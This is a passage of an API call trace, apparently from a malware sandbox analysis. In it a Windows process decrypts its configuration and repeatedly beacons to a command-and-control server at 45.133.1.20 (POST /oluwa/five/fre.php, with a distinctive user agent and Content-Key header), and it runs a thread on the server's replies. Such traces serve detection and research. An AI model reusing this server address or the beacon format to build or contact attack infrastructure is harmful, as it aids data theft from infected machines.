(dwMilliseconds=0xea60) [0159.838] GetProcessHeap () returned 0x6a0000 [0159.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0159.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.950] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0159.958] GetProcessHeap () returned 0x6a0000 [0159.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0159.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.959] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0159.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.960] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.961] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.961] GetProcessHeap () returned 0x6a0000 [0159.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0159.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.962] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0159.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.964] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0159.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.967] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0159.967] GetProcessHeap () returned 0x6a0000 [0159.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0159.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.968] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0160.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.015] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0160.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.017] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0160.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.018] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0160.018] GetProcessHeap () returned 0x6a0000 [0160.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0160.018] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0160.024] GetProcessHeap () returned 0x6a0000 [0160.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0160.024] GetProcessHeap () returned 0x6a0000 [0160.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0160.025] GetProcessHeap () returned 0x6a0000 [0160.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0160.025] GetProcessHeap () returned 0x6a0000 [0160.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0160.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.027] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0160.094] GetProcessHeap () returned 0x6a0000 [0160.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0160.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.095] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0160.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.096] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0160.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.097] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.098] GetProcessHeap () returned 0x6a0000 [0160.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0160.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.100] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0160.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.101] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0160.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.101] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0160.102] GetProcessHeap () returned 0x6a0000 [0160.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0160.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.102] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0160.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.103] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0160.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.104] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0160.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.105] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0160.105] GetProcessHeap () returned 0x6a0000 [0160.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0160.117] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9e88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0160.117] GetProcessHeap () returned 0x6a0000 [0160.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0160.117] socket (af=2, type=1, protocol=6) returned 0x2a4 [0160.117] connect (s=0x2a4, name=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0160.140] FreeAddrInfoW (pAddrInfo=0x6b9e88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0160.140] GetProcessHeap () returned 0x6a0000 [0160.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0160.140] GetProcessHeap () returned 0x6a0000 [0160.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0160.141] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.142] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0160.142] GetProcessHeap () returned 0x6a0000 [0160.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0160.142] GetProcessHeap () returned 0x6a0000 [0160.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.143] GetProcessHeap () returned 0x6a0000 [0160.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0160.143] GetProcessHeap () returned 0x6a0000 [0160.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0160.144] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.145] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0160.145] GetProcessHeap () returned 0x6a0000 [0160.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0160.145] GetProcessHeap () returned 0x6a0000 [0160.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.146] send (s=0x2a4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0160.148] send (s=0x2a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0160.148] GetProcessHeap () returned 0x6a0000 [0160.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0160.148] recv (in: s=0x2a4, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0160.241] GetProcessHeap () returned 0x6a0000 [0160.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0160.241] GetProcessHeap () returned 0x6a0000 [0160.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0160.242] GetProcessHeap () returned 0x6a0000 [0160.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0160.242] GetProcessHeap () returned 0x6a0000 [0160.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0160.242] closesocket (s=0x2a4) returned 0 [0160.243] GetProcessHeap () returned 0x6a0000 [0160.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0160.243] GetProcessHeap () returned 0x6a0000 [0160.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0160.244] GetProcessHeap () returned 0x6a0000 [0160.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0160.244] GetProcessHeap () returned 0x6a0000 [0160.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0160.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x77c) returned 0x2a4 [0160.248] Sleep (dwMilliseconds=0xea60) [0160.250] GetProcessHeap () returned 0x6a0000 [0160.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0160.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.251] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0160.269] GetProcessHeap () returned 0x6a0000 [0160.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0160.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.271] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0160.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.309] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0160.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.310] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.310] GetProcessHeap () returned 0x6a0000 [0160.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0160.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.312] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0160.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.314] CryptDestroyKey (hKey=0x6ad020) returned 1 [0160.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.315] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0160.315] GetProcessHeap () returned 0x6a0000 [0160.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0160.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.316] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0160.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.318] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0160.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.320] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0160.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.327] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0160.327] GetProcessHeap () returned 0x6a0000 [0160.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0160.327] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0160.327] GetProcessHeap () returned 0x6a0000 [0160.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0160.328] GetProcessHeap () returned 0x6a0000 [0160.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0160.328] GetProcessHeap () returned 0x6a0000 [0160.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0160.329] GetProcessHeap () returned 0x6a0000 [0160.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0160.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.330] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.341] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0160.349] GetProcessHeap () returned 0x6a0000 [0160.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0160.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.351] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0160.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.352] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0160.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.354] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0160.354] GetProcessHeap () returned 0x6a0000 [0160.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0160.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.356] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0160.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.357] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0160.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.358] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0160.358] GetProcessHeap () returned 0x6a0000 [0160.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0160.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.360] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0160.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.361] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0160.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.362] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0160.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.364] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0160.364] GetProcessHeap () returned 0x6a0000 [0160.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0160.364] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0160.364] GetProcessHeap () returned 0x6a0000 [0160.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0160.364] socket (af=2, type=1, protocol=6) returned 0x2a8 [0160.364] connect (s=0x2a8, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0160.387] FreeAddrInfoW (pAddrInfo=0x6b9d48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0160.387] GetProcessHeap () returned 0x6a0000 [0160.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0160.388] GetProcessHeap () returned 0x6a0000 [0160.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0160.389] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.390] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0160.390] GetProcessHeap () returned 0x6a0000 [0160.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0160.390] GetProcessHeap () returned 0x6a0000 [0160.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.390] GetProcessHeap () returned 0x6a0000 [0160.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0160.390] GetProcessHeap () returned 0x6a0000 [0160.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0160.391] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0160.392] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0160.392] GetProcessHeap () returned 0x6a0000 [0160.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0160.392] GetProcessHeap () returned 0x6a0000 [0160.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0160.393] send (s=0x2a8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0160.394] send (s=0x2a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0160.394] GetProcessHeap () returned 0x6a0000 [0160.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0160.394] recv (in: s=0x2a8, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0160.461] GetProcessHeap () returned 0x6a0000 [0160.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0160.462] GetProcessHeap () returned 0x6a0000 [0160.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0160.463] GetProcessHeap () returned 0x6a0000 [0160.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0160.463] GetProcessHeap () returned 0x6a0000 [0160.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0160.464] closesocket (s=0x2a8) returned 0 [0160.464] GetProcessHeap () returned 0x6a0000 [0160.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0160.464] GetProcessHeap () returned 0x6a0000 [0160.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0160.465] GetProcessHeap () returned 0x6a0000 [0160.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0160.466] GetProcessHeap () returned 0x6a0000 [0160.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0160.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1080) returned 0x2a8 [0160.469] Sleep (dwMilliseconds=0xea60) [0160.486] GetProcessHeap () returned 0x6a0000 [0160.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0160.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.537] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0160.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0160.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0160.563] GetProcessHeap () returned 0x6a0000 [0160.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9b78 [0160.564] LoadLibraryW 